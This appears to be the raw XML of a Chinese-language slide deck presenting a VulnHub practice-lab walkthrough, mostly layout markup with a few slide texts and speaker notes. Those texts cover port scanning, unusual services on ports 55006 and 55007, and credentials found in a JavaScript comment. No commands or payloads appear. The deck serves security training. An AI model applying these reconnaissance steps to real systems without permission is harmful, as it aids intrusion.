          <a:avLst>
            <a:gd name="adj1" fmla="val 6452"/>
            <a:gd name="adj2" fmla="val 429999"/>
            <a:gd name="adj3" fmla="val 10489124"/>
            <a:gd name="adj4" fmla="val 14837806"/>
            <a:gd name="adj5" fmla="val 7527"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent1">
            <a:shade val="90000"/>
            <a:hueOff val="174613"/>
            <a:satOff val="-2991"/>
            <a:lumOff val="1198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3FED63FC-B29E-41B4-90BF-69AB67019CB1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1154188" y="-176713"/>
          <a:ext cx="2329608" cy="2329608"/>
        </a:xfrm>
        <a:prstGeom prst="circularArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 5984"/>
            <a:gd name="adj2" fmla="val 394124"/>
            <a:gd name="adj3" fmla="val 13313824"/>
            <a:gd name="adj4" fmla="val 10508221"/>
            <a:gd name="adj5" fmla="val 6981"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent1">
            <a:shade val="90000"/>
            <a:hueOff val="349225"/>
            <a:satOff val="-5981"/>
            <a:lumOff val="2396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2">
  <dgm:title val=""/>
  <dgm:desc val=""/>
  <dgm:catLst>
    <dgm:cat type="relationship" pri="3000"/>
    <dgm:cat type="process" pri="28000"/>
    <dgm:cat type="cycle" pri="14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srcNode" val="gear1srcNode"/>
          <dgm:param type="dstNode" val="gear1dstNode"/>
          <dgm:param type="connRout" val="curv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srcNode" val="gear2srcNode"/>
          <dgm:param type="dstNode" val="gear2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srcNode" val="gear3srcNode"/>
          <dgm:param type="dstNode" val="gear3dstNode"/>
          <dgm:param type="connRout" val="curv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31FCF-FD02-4524-BE12-656355EB53DB}"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F07B4-ED7B-4B16-865B-801A4C79547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宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>发现有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>55006</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>55007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>两个端口运行不知名服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>遂进一步扫描具体信息</a:t>
            </a:r>
          </a:p>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1354048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13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1612047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记得说为什么要用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>boris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>natalya</a:t>
            </a:r>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2646076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15</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4160973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16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4196459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17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266702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18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3827617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19</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2776945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20</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1798211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21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1374744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333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>vulnhub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>是个提供各种漏洞平台的综合靶场，可供下载多种虚拟机进行下载，本地</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>VM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>打开即可，像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。</a:t>
            </a:r>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a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2373687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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2764491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23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2501239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24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2724926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26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2478389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27</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2815612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28</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="970112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29</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3079860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31</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2245913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32</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1826708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33</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69982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3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4212699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34</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233384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35</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="650515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36</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236962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37</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="47706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记得说排除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.1 .2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的原因</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55CF07B4-ED7B-4B16-865B-801A4C795474}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2685801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因为开了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口，有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务，所以猜想可以直接浏览器访问！！！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55CF07B4-ED7B-4B16-865B-801A4C795474}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1170221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8</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2024404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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>访问terminal.js 在注释的地方获得了用户名和密码</a:t>
            </a:r>
          </a:p>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9</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3131901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10</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209305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5CF07B4-ED7B-4B16-865B-801A4C795474}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419231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矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6728059"/>
            <a:ext cx="12192000" cy="129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 y="-1"/>
            <a:ext cx="12182477" cy="856212"/>
            <a:chOff x="-1" y="-1"/>
            <a:chExt cx="12182477" cy="856212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-1"/>
              <a:ext cx="12182476" cy="856212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:alpha val="77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00000" contrast="100000"/>
                      </a14:imgEffect>
                      <a14:imgEffect>
                        <a14:colorTemperature colorTemp="1500"/>
                      </a14:imgEffect>
                      <a14:imgEffect>
                        <a14:saturation sat="0"/>
                      </a14:imgEffect>
                    </a14:imgLayer>
                  </a14:imgProps>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="606" t="-18105" r="1201" b="1"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="248846"/>
              <a:ext cx="12182477" cy="516766"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="矩形 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9524" y="-1"/>
              <a:ext cx="12172952" cy="856211"/>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1" name="文本占位符 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9524" y="1"/>
            <a:ext cx="12172952" cy="856210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="144000" tIns="144000" rIns="144000" bIns="144000" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="36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a:t>单击此处编辑标题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="内容占位符 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639763" y="1420813"/>
            <a:ext cx="10964862" cy="4656137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="800100" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1257300" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1657350" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2114550" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx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灯片编号占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982973" y="6348122"/>
            <a:ext cx="1037230" cy="342900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6C53781C-E1F6-4315-A39D-61273F2E0596}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11"/>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r="71419"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="193905" y="122669"/>
            <a:ext cx="659535" cy="61087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白底">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6728059"/>
            <a:ext cx="12192000" cy="129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a:off x="-1" y="-1"/>
            <a:ext cx="12182477" cy="856212"/>
            <a:chOff x="-1" y="-1"/>
            <a:chExt cx="12182477" cy="856212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-1"/>
              <a:ext cx="12182476" cy="856212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:alpha val="7700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100000" contrast="100000"/>
                      </a14:imgEffect>
                      <a14:imgEffect>
                        <a14:colorTemperature colorTemp="1500"/>
                      </a14:imgEffect>
                      <a14:imgEffect>
                        <a14:saturation sat="0"/>
                      </a14:imgEffect>
                    </a14:imgLayer>
                  </a14:imgProps>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect l="606" t="-18105" r="1201" b="1"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="-1" y="248846"/>
              <a:ext cx="12182477" cy="516766"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="矩形 9"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9524" y="-1"/>
              <a:ext cx="12172952" cy="856211"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:gradFill>
